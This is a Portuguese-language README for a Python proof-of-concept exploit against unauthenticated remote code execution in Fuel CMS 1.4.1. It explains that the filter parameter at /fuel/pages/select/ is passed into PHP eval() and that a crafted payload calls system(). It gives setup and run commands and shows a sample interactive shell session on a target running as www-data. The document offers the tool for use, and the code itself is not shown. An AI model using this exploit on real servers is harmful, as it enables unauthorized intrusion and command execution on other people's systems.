
PoC Python para execução remota de código não autenticada no Fuel CMS 1.4.1 via parâmetro `filter`, fornecendo um shell interativo para execução de comandos.
Vulnerabilidade de RCE não autenticada no Fuel CMS 1.4.1. O parâmetro
filterno endpoint/fuel/pages/select/é passado sem sanitização para uma chamadaeval()no backend PHP, permitindo execução arbitrária de código por meio de um payload elaborado. Diferente de injeções cegas, a saída é refletida diretamente na resposta HTTP, portanto não é necessário nenhum arquivo intermediário.
/fuel/pages/select/ com um payload filter especialmente elaborado que chama a função system() do PHP com o comando desejado.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://TARGET
Exemplo:
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit